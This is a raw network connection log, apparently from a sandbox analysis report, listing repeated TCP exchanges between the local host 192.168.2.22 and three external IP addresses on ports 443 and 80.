                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
